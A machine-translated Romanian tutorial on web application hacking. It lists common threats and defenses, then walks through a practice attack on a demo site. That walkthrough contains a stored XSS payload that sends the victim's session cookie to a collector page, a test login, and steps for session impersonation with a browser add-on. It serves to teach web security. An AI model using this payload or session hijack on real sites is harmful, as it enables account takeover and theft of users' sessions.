Mai multe persoane au acces la internet decât oricând înainte. Acest lucru a determinat multe organizații să dezvolte aplicații bazate pe web pe care utilizatorii le pot utiliza online pentru a interacționa cu organizația. Codul slab scris pentru aplicațiile web poate fi exploatat pentru a obține acces neautorizat la date sensibile și servere web.

în acest tutorial veți învăța cum să hack site-uri web, și vă vom prezenta tehnici de hacking aplicație web și măsurile contra puteți pune în aplicare pentru a proteja împotriva unor astfel de atacuri.

subiectele abordate în acest tutorial

• ce este o aplicație web? Ce sunt amenințările Web?
• cum de a proteja site-ul dvs. împotriva hacks?
• site-ul hacking Trucuri: Hack un site online!

ce este o aplicație web? Ce sunt amenințările Web?

o aplicație web (aka site-ul web) este o aplicație bazată pe modelul client-server. Serverul oferă acces la baza de date și logica de afaceri. Este găzduit pe un server web. Aplicația client rulează pe browserul web client. Aplicațiile Web sunt de obicei scrise în limbi precum Java, C # și VB.Net, PHP, limbaj de marcare ColdFusion etc. motoarele de baze de date utilizate în aplicațiile web includ MySQL, MS SQL Server, PostgreSQL, SQLite etc.

majoritatea aplicațiilor web sunt găzduite pe servere publice accesibile prin Internet. Acest lucru îi face vulnerabili la atacuri datorită accesibilității ușoare. Următoarele sunt amenințări comune ale aplicațiilor web.

• SQL Injection – scopul acestei amenințări ar putea fi ocolirea algoritmilor de conectare, sabotarea datelor etc.
• Denial of Service atacuri– scopul acestei amenințări ar putea fi de a refuza accesul utilizatorilor legitimi la resursa
• Cross Site Scripting XSS– scopul acestei amenințări ar putea fi de a injecta cod care poate fi executat pe partea de client browser.
• cookie/Session Poisoning– scopul acestei amenințări este de a modifica cookie-urile / datele de sesiune de către un atacator pentru a obține acces neautorizat.
• falsificarea formularului – scopul acestei amenințări este de a modifica datele formularului, cum ar fi prețurile din aplicațiile de comerț electronic, astfel încât atacatorul să poată obține articole la prețuri reduse.
• Code Injection – scopul acestei amenințări este de a injecta cod, cum ar fi PHP, Python, etc. care poate fi executat pe server. Codul poate instala backdoors, dezvăluie informații sensibile, etc.
• Defacement-scopul acestei amenințări este de a modifica pagina afișată pe un site web și redirecționarea tuturor cererilor de pagină către o singură pagină care conține mesajul atacatorului.

cum de a proteja site-ul dvs. împotriva hacks?

o organizație poate adopta următoarea politică pentru a se proteja împotriva atacurilor serverului web.

• SQL Injection– dezinfectarea și validarea parametrilor utilizatorului înainte de a le trimite în baza de date pentru procesare poate ajuta la reducerea șanselor de atacare prin SQL Injection. Motoare de baze de date, cum ar fi MS SQL Server, MySQL, etc. parametrii de sprijin și declarațiile pregătite. Ele sunt mult mai sigure decât declarațiile SQL tradiționale
• Denial of Service atacuri – firewall-uri pot fi folosite pentru a scădea traficul de la adresa IP suspectă în cazul în care atacul este un simplu DoS. Configurarea corectă a rețelelor și a sistemului de detectare a intruziunilor poate ajuta, de asemenea, la reducerea șanselor unui atac DoS de succes.
• Cross Site Scripting – validarea și igienizarea anteturilor, parametrii trecuți prin URL, parametrii formularului și valorile ascunse pot ajuta la reducerea atacurilor XSS.
• otrăvire Cookie / sesiune– acest lucru poate fi prevenit prin criptarea conținutului cookie-urilor, sincronizarea cookie-urilor după ceva timp, asocierea cookie-urilor cu adresa IP a clientului care a fost utilizată pentru a le crea.
• temperarea formularului – acest lucru poate fi prevenit prin validarea și verificarea intrării utilizatorului înainte de procesarea acestuia.
• injectarea Codului – acest lucru poate fi prevenit prin tratarea tuturor parametrilor ca date, mai degrabă decât cod executabil. Igienizarea și validarea pot fi utilizate pentru a implementa acest lucru.
• Defacement – o bună politică de securitate pentru dezvoltarea aplicațiilor web ar trebui să se asigure că sigilează vulnerabilitățile utilizate în mod obișnuit pentru a accesa serverul web. Aceasta poate fi o configurație adecvată a sistemului de operare, a software-ului serverului web și a celor mai bune practici de securitate la dezvoltarea aplicațiilor web.

site-ul hacking Trucuri: Hack un site online

în acest site hacking scenariu practic, vom deturna sesiunea de utilizator a aplicației web Situat la www.techpanda.org. Vom folosi Cross Site scripting pentru a citi ID-ul sesiunii cookie, apoi îl vom folosi pentru a juca rolul unei sesiuni legitime a utilizatorului.

presupunerea făcută este că atacatorul are acces la aplicația web și ar dori să deturneze sesiunile altor utilizatori care utilizează aceeași aplicație. Scopul acestui atac ar putea fi obținerea accesului de administrator la aplicația web presupunând că contul de acces al atacatorului este unul limitat.

Noțiuni de bază

• Openhttp://www.techpanda.org/
• în scopuri practice, este recomandat să obțineți acces folosind SQL Injection. Consultați acest articol pentru mai multe informații despre cum să faceți acest lucru.
• E-mailul de conectare este această adresă de e-mail este protejată de spambots. Aveți nevoie de activarea JavaScript-ului pentru ao vizualiza., parola este Password2010
• dacă v-ați conectat cu succes, atunci veți obține următorul tablou de bord

• Faceți clic pe Adăugare Contact nou
• introduceți următoarele ca prenume

<a href=# onclick=\”document.location = \ ‘ http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>

aici,

codul de mai sus folosește JavaScript. Se adaugă un hyperlink cu un eveniment onclick. Când utilizatorul neavizat face clic pe link, evenimentul preia ID-ul sesiunii cookie PHP și îl trimite la snatch_sess_id.pagina php împreună cu ID-ul sesiunii în URL

• introduceți detaliile rămase așa cum se arată mai jos
• Faceți clic pe Salvați modificările

• tabloul de bord va arata acum ca următorul ecran

• deoarece codul script cross site-ul este stocat în baza de date, acesta va fi încărcat de fiecare dată utilizatorii cu drepturi de acces login
• să presupunem că datele de conectare administrator și clicuri pe hyperlink-ul care spune întuneric
• el/ea va primi fereastra cu ID-ul sesiunii arată în URL-ul

notă: script-ul ar putea fi trimiterea server de la distanță în cazul în care PHPSESSID este stocat apoi utilizatorul redirecționat înapoi la site-ul ca și cum nimic nu sa întâmplat.

notă: valoarea pe care o obțineți poate fi diferită de cea din acest tutorial de hacking pe pagina web, dar conceptul este același

personificarea sesiunii folosind Firefox și suplimentul de date de manipulare

diagrama de mai jos arată pașii pe care trebuie să îi urmați pentru a finaliza acest exercițiu.

• veți avea nevoie de Firefox browser web pentru această secțiune și datele de manipulare add-on
• deschideți Firefox și instalați add așa cum se arată în diagramele de mai jos

• căutați date de manipulare apoi faceți clic pe instalare așa cum se arată mai sus

• faceți clic pe pe Accepta și instala…

• Faceți clic pe Restart acum când instalarea se termină
• activați bara de meniu în Firefox dacă nu este afișat

• faceți clic pe meniul Instrumente, apoi selectați datele de manipulare așa cum se arată mai jos

• veți primi următoarea fereastră. Notă: În cazul în care Windows nu este gol, apăsați butonul clear

• Faceți clic pe meniul Start Tamper
• comuta înapoi la browser-ul web Firefox, tip http://www.techpanda.org/tabloul de bord.php apoi apăsați tasta enter pentru a încărca pagina
• veți primi următorul pop-up de la datele de manipulare

• fereastra pop-up are trei (3) opțiuni. Opțiunea de manipulare vă permite să modificați informațiile antetului HTTP înainte de a fi trimise la server.
• Faceți clic pe ea
• veți primi următoarea fereastră

• copiați ID-ul sesiunii PHP pe care l-ați copiat din URL-ul de atac și lipiți-l după semnul egal. Valoarea dvs. ar trebui să arate acum așa

PHPSESSID=2dvltipp2n8ldbn11b2ra76lm2

• Faceți clic pe butonul OK
• veți primi din nou fereastra pop-up a datelor de manipulare

• debifați caseta de selectare care solicită continuați manipularea frauduloasă?
• Faceți clic pe butonul submit când ați terminat
• ar trebui să puteți vedea tabloul de bord așa cum se arată mai jos

notă: nu ne-am logat, am imitat o sesiune de logare folosind valoarea PHPSESSID pe care am recuperat-o folosind Cross site scripting

Summary

• o aplicație web se bazează pe modelul server-client. Partea client utilizează browserul web pentru a accesa resursele de pe server.
• aplicațiile Web sunt de obicei accesibile pe internet. Acest lucru îi face vulnerabili la atacuri.
• amenințări de aplicații Web includ injecție SQL, injecție de cod, XSS, Defacement, otrăvire Cookie, etc.
• o politică de securitate bună atunci când se dezvoltă aplicații web poate ajuta să le facă sigure.